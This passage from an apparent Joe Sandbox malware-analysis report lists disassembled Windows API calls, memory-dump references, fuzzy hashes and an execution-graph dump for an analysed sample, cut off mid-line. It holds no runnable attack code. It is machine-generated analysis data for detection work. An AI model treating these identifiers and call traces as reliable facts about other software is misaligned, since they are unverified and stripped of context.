                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                                  • String ID: Version
                                                  • API String ID: 512980652-315105994
                                                  • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                  • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                  • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                  • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                  • GetTickCount.KERNEL32 ref: 00403303
                                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                  • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                  • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                  • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                  • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                  • String ID:
                                                  • API String ID: 2883127279-0
                                                  • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                  • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                  • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                  • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringlstrcmp
                                                  • String ID: !N~
                                                  • API String ID: 623250636-529124213
                                                  • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                  • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                  • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                  • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                  APIs
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                  • CloseHandle.KERNEL32(?), ref: 00405C71
                                                  Strings
                                                  • Error launching installer, xrefs: 00405C48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                  • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                  • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                  • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                  APIs
                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: CloseHandlelstrlenwvsprintf
                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                  • API String ID: 3509786178-2769509956
                                                  • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                  • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                  • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                  • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                  • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                  • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                  • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                  • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                  • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                  Execution Graph

                                                  Execution Coverage:4.2%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:2.2%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:94
                                                  execution_graph 98087 e3e463 98099 e0373a 98087->98099 98089 e3e479 98090 e3e4fa 98089->98090 98091 e3e48f 98089->98091 98108 e0b020 98090->98108 98150 e05376 60 API calls 98091->98150 98095 e3e4ce 98098 e3e4ee Mailbox 98095->98098 98151 e6890a 59 API calls Mailbox 98095->98151 98097 e3f046 Mailbox 98098->98097 98152 e6a48d 89 API calls 4 library calls 98098->98152 98100 e03746 98099->98100 98101 e03758 98099->98101 98153 e0523c 59 API calls 98100->98153 98103 e03787 98101->98103 98104 e0375e 98101->98104 98164 e0523c 59 API calls 98103->98164 98154 e20fe6 98104->98154 98107 e03750 98107->98089 98193 e13740 98108->98193 98110 e0b07f 98112 e430b6 98110->98112 98114 e430d4 98110->98114 98145 e0bb86 98110->98145 98146 e0b132 Mailbox _memmove 98110->98146 98289 e6a48d 89 API calls 4 library calls 98112->98289 98290 e6a48d 89 API calls 4 library calls 98114->98290 98116 e4355e 98149 e0b4dd 98116->98149 98333 e6a48d 89 API calls 4 library calls 98116->98333 98117 e5730a 59 API calls 98117->98146 98118 e4318a 98118->98149 98292 e6a48d 89 API calls 4 library calls 98118->98292 98120 e20fe6 59 API calls Mailbox 98120->98146 98124 e43106 98124->98118 98291 e0a9de 298 API calls 98124->98291 98127 e053b0 298 API calls 98127->98146 98128 e03b31 59 API calls 98128->98146 98131 e43418 98299 e053b0 98131->98299 98133 e43448 98133->98149 98327 e039be 98133->98327 98138 e431c3 98293 e6a48d 89 API calls 4 library calls 98138->98293 98139 e03c30 68 API calls 98139->98146 98140 e4346f 98331 e6a48d 89 API calls 4 library calls 98140->98331 98143 e0523c 59 API calls 98143->98146 98288 e6a48d 89 API calls 4 library calls 98145->98288 98146->98116 98146->98117 98146->98120 98146->98124 98146->98127 98146->98128 98146->98131 98146->98138 98146->98139 98146->98140 98146->98143 98146->98145 98147 e11c9c 59 API calls 98146->98147 98146->98149 98198 e03add 98146->98198 98205 e0bc70 98146->98205 98286 e03a40 59 API calls Mailbox 98146->98286 98287 e05190 59 API calls Mailbox 98146->98287 98294 e56c62 59 API calls 2 library calls 98146->98294 98295 e7a9c3 85 API calls Mailbox 98146->98295 98296 e56c1e 59 API calls Mailbox 98146->98296 98297 e65ef2 68 API calls 98146->98297 98298 e03ea3 68 API calls Mailbox 98146->98298 98332 e6a12a 59 API calls 98146->98332 98147->98146 98149->98098 98150->98095 98151->98098 98152->98097 98153->98107 98157 e20fee 98154->98157 98156 e21008 98156->98107 98157->98156 98159 e2100c std::exception::exception 98157->98159 98165 e2593c 98157->98165 98182 e235d1 DecodePointer 98157->98182 98183 e287cb RaiseException 98159->98183 98161 e21036 98184 e28701 58 API calls _free 98161->98184 98163 e21048 98163->98107 98164->98107 98166 e259b7 98165->98166 98175 e25948 98165->98175 98191 e235d1 DecodePointer 98166->98191 98168 e259bd 98192 e28d58 58 API calls __getptd_noexit 98168->98192 98171 e2597b RtlAllocateHeap 98171->98175 98181 e259af 98171->98181 98173 e25953 98173->98175 98185 e2a39b 58 API calls 2 library calls 98173->98185 98186 e2a3f8 58 API calls 7 library calls 98173->98186 98187 e232cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98173->98187 98174 e259a3 98189 e28d58 58 API calls __getptd_noexit 98174->98189 98175->98171 98175->98173 98175->98174 98179 e259a1 98175->98179 98188 e235d1 DecodePointer 98175->98188 98190 e28d58 58 API calls __getptd_noexit 98179->98190 98181->98157 98182->98157 98183->98161 98184->98163 98185->98173 98186->98173 98188->98175 98189->98179 98190->98181 98191->98168 98192->98181 98194 e1374f 98193->98194 98197 e1376a 98193->98197 98334 e11aa4 98194->98334 98196 e13757 CharUpperBuffW 98196->98197 98197->98110 98199 e3d3cd 98198->98199 98200 e03aee 98198->98200 98201 e20fe6 Mailbox 59 API calls 98200->98201 98202 e03af5 98201->98202 98203 e03b16 98202->98203 98338 e03ba5 59 API calls Mailbox 98202->98338 98203->98146 98206 e4359f 98205->98206 98213 e0bc95 98205->98213 98460 e6a48d 89 API calls 4 library calls 98206->98460 98208 e0bf3b 98208->98146 98212 e0c2b6 98212->98208 98214 e0c2c3 98212->98214 98278 e0bca5 Mailbox 98213->98278 98461 e05376 60 API calls 98213->98461 98462 e5700c 298 API calls 98213->98462 98458 e0c483 298 API calls Mailbox 98214->98458 98217 e0c2ca LockWindowUpdate DestroyWindow GetMessageW 98217->98208 98218 e0c2fc 98217->98218 98219 e44509 TranslateMessage DispatchMessageW GetMessageW 98218->98219 98219->98219 98221 e44539 98219->98221 98220 e436b3 Sleep 98220->98278 98221->98208 98222 e20fe6 59 API calls Mailbox 98222->98278 98223 e4405d WaitForSingleObject 98229 e4407d GetExitCodeProcess CloseHandle 98223->98229 98223->98278 98224 e0bf54 timeGetTime 98224->98278 98226 e0c210 Sleep 98257 e0c1fa Mailbox 98226->98257 98233 e0c36b 98229->98233 98230 e443a9 Sleep 98230->98257 98233->98146 98234 e0c324 timeGetTime 98459 e05376 60 API calls 98234->98459 98235 e2083e timeGetTime 98235->98257 98239 e44440 GetExitCodeProcess 98244 e44456 WaitForSingleObject 98239->98244 98245 e4446c CloseHandle 98239->98245 98240 e86562 110 API calls 98240->98257 98242 e06d79 109 API calls 98242->98278 98244->98245 98244->98278 98245->98257 98246 e438aa Sleep 98246->98278 98247 e444c8 Sleep 98247->98278 98250 e11a36 59 API calls 98250->98257 98253 e05376 60 API calls 98253->98278 98256 e0c26d 98453 e11a36 98256->98453 98257->98226 98257->98233 98257->98235 98257->98239 98257->98240 98257->98246 98257->98247 98257->98250 98257->98278 98491 e11207 98257->98491 98496 e62baf 60 API calls 98257->98496 98497 e05376 60 API calls 98257->98497 98498 e03ea3 68 API calls Mailbox 98257->98498 98499 e06cd8 298 API calls 98257->98499 98540 e570e2 59 API calls 98257->98540 98541 e657ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98257->98541 98542 e64148 CreateToolhelp32Snapshot Process32FirstW 98257->98542 98258 e0b020 276 API calls 98258->98278 98262 e0bf25 Mailbox 98262->98208 98457 e0c460 10 API calls Mailbox 98262->98457 98263 e6a48d 89 API calls 98263->98278 98265 e039be 68 API calls 98265->98278 98266 e05190 59 API calls Mailbox 98266->98278 98268 e053b0 276 API calls 98268->98278 98270 e43e13 VariantClear 98270->98278 98271 e56cf1 59 API calls Mailbox 98271->98278 98272 e43ea9 VariantClear 98272->98278 98273 e041c4 59 API calls Mailbox 98273->98278 98274 e57aad 59 API calls 98274->98278 98275 e43c57 VariantClear 98275->98278 98276 e11a36 59 API calls 98276->98278 98277 e03ea3 68 API calls 98277->98278 98278->98220 98278->98222 98278->98223 98278->98224 98278->98226 98278->98230 98278->98233 98278->98234 98278->98242 98278->98253 98278->98256 98278->98257 98278->98258 98278->98262 98278->98263 98278->98265 98278->98266 98278->98268 98278->98270 98278->98271 98278->98272 98278->98273 98278->98274 98278->98275 98278->98276 98278->98277 98279 e06cd8 276 API calls 98278->98279 98339 e052b0 98278->98339 98348 e09a00 98278->98348 98355 e09c80 98278->98355 98386 e0a820 98278->98386 98403 e6e4a0 98278->98403 98406 e6bcd6 98278->98406 98436 e7e60c 98278->98436 98439 e6c270 98278->98439 98446 e142cf 98278->98446 98450 e6412a 98278->98450 98463 e11c9c 98278->98463 98467 e86655 59 API calls 98278->98467 98468 e6a058 59 API calls Mailbox 98278->98468 98469 e5e0aa 59 API calls 98278->98469 98470 e04d37 98278->98470 98488 e56c62 59 API calls 2 library calls 98278->98488 98489 e038ff 59 API calls 98278->98489 98490 e03a40 59 API calls Mailbox 98278->98490 98500 e7c355 98278->98500 98279->98278 98286->98146 98287->98146 98288->98112 98289->98149 98290->98149 98291->98118 98292->98149 98293->98149 98294->98146 98295->98146 98296->98146 98297->98146 98298->98146 98300 e053cf 98299->98300 98309 e053fd Mailbox 98299->98309 98301 e20fe6 Mailbox 59 API calls 98300->98301 98301->98309 98302 e069fa 98303 e11c9c 59 API calls 98302->98303 98304 e05569 Mailbox 98303->98304 98304->98133 98305 e069ff 98306 e3e691 98305->98306 98307 e3f165 98305->98307 99397 e6a48d 89 API calls 4 library calls 98306->99397 99401 e6a48d 89 API calls 4 library calls 98307->99401 98309->98302 98309->98304 98309->98305 98309->98306 98312 e20fe6 59 API calls Mailbox 98309->98312 98315 e3ea9a 98309->98315 98316 e11c9c 59 API calls 98309->98316 98317 e11207 59 API calls 98309->98317 98320 e3eb67 98309->98320 98321 e22f70 67 API calls __cinit 98309->98321 98323 e57aad 59 API calls 98309->98323 98324 e3ef28 98309->98324 98326 e05a1a 98309->98326 99395 e07e50 298 API calls 2 library calls 98309->99395 99396 e06e30 60 API calls Mailbox 98309->99396 98312->98309 98313 e3e6a0 98313->98133 98319 e11c9c 59 API calls 98315->98319 98316->98309 98317->98309 98319->98304 98320->98304 99398 e57aad 59 API calls 98320->99398 98321->98309 98323->98309 99399 e6a48d 89 API calls 4 library calls 98324->99399 99400 e6a48d 89 API calls 4 library calls 98326->99400 98328 e039c9 98327->98328 98330 e039f0 98328->98330 99402 e03ea3 68 API calls Mailbox 98328->99402 98330->98140 98331->98149 98332->98146 98333->98149 98335 e11ab7 98334->98335 98337 e11ab4 _memmove 98334->98337 98336 e20fe6 Mailbox 59 API calls 98335->98336 98336->98337 98337->98196 98338->98203 98340 e052c6 98339->98340 98342 e05313 98339->98342 98341 e052d3 PeekMessageW 98340->98341 98340->98342 98341->98342 98343 e052ec 98341->98343 98342->98343 98345 e3df68 TranslateAcceleratorW 98342->98345 98346 e05352 TranslateMessage DispatchMessageW 98342->98346 98347 e0533e PeekMessageW 98342->98347 98552 e0359e 98342->98552 98343->98278 98345->98342 98345->98347 98346->98347 98347->98342 98347->98343 98349 e09a31 98348->98349 98350 e09a1d 98348->98350 98591 e6a48d 89 API calls 4 library calls 98349->98591 98557 e094e0 98350->98557 98352 e09a28 98352->98278 98354 e42478 98354->98354 98356 e09cb5 98355->98356 98357 e4247d 98356->98357 98360 e09d1f 98356->98360 98369 e09d79 98356->98369 98358 e053b0 298 API calls 98357->98358 98359 e42492 98358->98359 98382 e09f50 Mailbox 98359->98382 98601 e6a48d 89 API calls 4 library calls 98359->98601 98363 e11207 59 API calls 98360->98363 98360->98369 98361 e11207 59 API calls 98361->98369 98365 e424d8 98363->98365 98364 e22f70 __cinit 67 API calls 98364->98369 98602 e22f70 98365->98602 98366 e424fa 98366->98278 98368 e039be 68 API calls 98368->98382 98369->98361 98369->98364 98369->98366 98372 e09f3a 98369->98372 98369->98382 98370 e053b0 298 API calls 98370->98382 98372->98382 98605 e6a48d 89 API calls 4 library calls 98372->98605 98373 e0a775 98609 e6a48d 89 API calls 4 library calls 98373->98609 98377 e427f9 98377->98278 98378 e04230 59 API calls 98378->98382 98379 e0a058 98379->98278 98382->98368 98382->98370 98382->98373 98382->98378 98382->98379 98385 e6a48d 89 API calls 98382->98385 98600 e11bcc 59 API calls 2 library calls 98382->98600 98606 e57aad 59 API calls 98382->98606 98607 e7ccac 298 API calls 98382->98607 98608 e7bc26 298 API calls Mailbox 98382->98608 98610 e05190 59 API calls Mailbox 98382->98610 98611 e79ab0 298 API calls Mailbox 98382->98611 98385->98382 98387 e42d51 98386->98387 98390 e0a84c 98386->98390 98691 e6a48d 89 API calls 4 library calls 98387->98691 98389 e42d62 98389->98278 98391 e42d6a 98390->98391 98399 e0a888 _memmove 98390->98399 98692 e6a48d 89 API calls 4 library calls 98391->98692 98394 e20fe6 59 API calls Mailbox 98394->98399 98395 e42dae 98693 e0a9de 298 API calls 98395->98693 98397 e053b0 298 API calls 98397->98399 98398 e42dc8 98400 e0a975 98398->98400 98694 e6a48d 89 API calls 4 library calls 98398->98694 98399->98394 98399->98395 98399->98397 98399->98398 98399->98400 98401 e0a962 98399->98401 98400->98278 98401->98400 98690 e7a9c3 85 API calls Mailbox 98401->98690 98695 e6f87d 98403->98695 98405 e6e4b0 98405->98278 98407 e6bcf5 98406->98407 98408 e6bdbb Mailbox 98406->98408 98846 e0502b 98407->98846 98410 e04d37 84 API calls 98408->98410 98418 e6bdc3 Mailbox 98408->98418 98412 e6bdf3 98410->98412 98411 e6bd00 98414 e0502b 59 API calls 98411->98414 98413 e04d37 84 API calls 98412->98413 98415 e6be05 98413->98415 98416 e6bd14 98414->98416 98922 e63ce2 98415->98922 98416->98408 98419 e11207 59 API calls 98416->98419 98418->98278 98420 e6bd25 98419->98420 98421 e11207 59 API calls 98420->98421 98422 e6bd2e 98421->98422 98423 e04d37 84 API calls 98422->98423 98424 e6bd3b 98423->98424 98850 e20119 98424->98850 98426 e6bd4e 98901 e117e0 98426->98901 98429 e6bd88 Mailbox 98431 e0502b 59 API calls 98429->98431 98430 e6412a 3 API calls 98432 e6bd6e 98430->98432 98431->98408 98432->98429 98433 e11a36 59 API calls 98432->98433 98434 e6bd7f 98433->98434 98910 e63f1d 98434->98910 99107 e7d1c6 98436->99107 98438 e7e61c 98438->98278 98440 e04d37 84 API calls 98439->98440 98441 e6c286 98440->98441 99217 e64005 98441->99217 98443 e6c28e 98444 e6c292 GetLastError 98443->98444 98445 e6c2a7 98443->98445 98444->98445 98445->98278 98447 e142d9 98446->98447 98448 e142e8 98446->98448 98447->98278 98448->98447 98449 e142ed CloseHandle 98448->98449 98449->98447 99241 e6494a GetFileAttributesW 98450->99241 98454 e11a45 __wsetenvp _memmove 98453->98454 98455 e20fe6 Mailbox 59 API calls 98454->98455 98456 e11a83 98455->98456 98456->98262 98457->98212 98458->98217 98459->98278 98460->98213 98461->98213 98462->98213 98464 e11ca7 98463->98464 98465 e11caf 98463->98465 99245 e11bcc 59 API calls 2 library calls 98464->99245 98465->98278 98467->98278 98468->98278 98469->98278 98471 e04d51 98470->98471 98480 e04d4b 98470->98480 98472 e3db28 __i64tow 98471->98472 98473 e04d99 98471->98473 98475 e04d57 __itow 98471->98475 98478 e3da2f 98471->98478 99246 e238c8 83 API calls 3 library calls 98473->99246 98477 e20fe6 Mailbox 59 API calls 98475->98477 98479 e04d71 98477->98479 98481 e20fe6 Mailbox 59 API calls 98478->98481 98486 e3daa7 Mailbox _wcscpy 98478->98486 98479->98480 98482 e11a36 59 API calls 98479->98482 98480->98278 98483 e3da74 98481->98483 98482->98480 98484 e20fe6 Mailbox 59 API calls 98483->98484 98485 e3da9a 98484->98485 98485->98486 98487 e11a36 59 API calls 98485->98487 99247 e238c8 83 API calls 3 library calls 98486->99247 98487->98486 98488->98278 98489->98278 98490->98278 98492 e20fe6 Mailbox 59 API calls 98491->98492 98493 e11228 98492->98493 98494 e20fe6 Mailbox 59 API calls 98493->98494 98495 e11236 98494->98495 98495->98257 98496->98257 98497->98257 98498->98257 98499->98257 98501 e7c380 98500->98501 98502 e7c39a 98500->98502 99275 e6a48d 89 API calls 4 library calls 98501->99275 99248 e7a8fd 98502->99248 98506 e053b0 297 API calls 98507 e7c406 98506->98507 98508 e7c498 98507->98508 98512 e7c447 98507->98512 98533 e7c392 Mailbox 98507->98533 98509 e7c4ee 98508->98509 98510 e7c49e 98508->98510 98511 e04d37 84 API calls 98509->98511 98509->98533 99276 e67ed5 59 API calls 98510->99276 98513 e7c500 98511->98513 98517 e6789a 59 API calls 98512->98517 98515 e11aa4 59 API calls 98513->98515 98519 e7c524 CharUpperBuffW 98515->98519 98516 e7c4c1 99277 e135b9 59 API calls Mailbox 98516->99277 98518 e7c477 98517->98518 98521 e56ebc 297 API calls 98518->98521 98523 e7c53e 98519->98523 98521->98533 98522 e7c4c9 Mailbox 98527 e0b020 297 API calls 98522->98527 98524 e7c545 98523->98524 98525 e7c591 98523->98525 99255 e6789a 98524->99255 98526 e04d37 84 API calls 98525->98526 98528 e7c599 98526->98528 98527->98533 99278 e05376 60 API calls 98528->99278 98533->98278 98534 e7c5a3 98534->98533 98535 e04d37 84 API calls 98534->98535 98536 e7c5be 98535->98536 99279 e135b9 59 API calls Mailbox 98536->99279 98538 e7c5ce 98539 e0b020 297 API calls 98538->98539 98539->98533 98540->98257 98541->98257 99387 e64ce2 98542->99387 98544 e64244 CloseHandle 98544->98257 98545 e64195 Process32NextW 98545->98544 98550 e6418e Mailbox 98545->98550 98546 e11207 59 API calls 98546->98550 98547 e11a36 59 API calls 98547->98550 98548 e20119 59 API calls 98548->98550 98549 e117e0 59 API calls 98549->98550 98550->98544 98550->98545 98550->98546 98550->98547 98550->98548 98550->98549 98551 e1151f 61 API calls 98550->98551 98551->98550 98553 e035b0 98552->98553 98554 e035e2 98552->98554 98553->98554 98555 e035d5 IsDialogMessageW 98553->98555 98556 e3d273 GetClassLongW 98553->98556 98554->98342 98555->98553 98555->98554 98556->98553 98556->98555 98558 e053b0 298 API calls 98557->98558 98559 e0951f 98558->98559 98560 e42001 98559->98560 98576 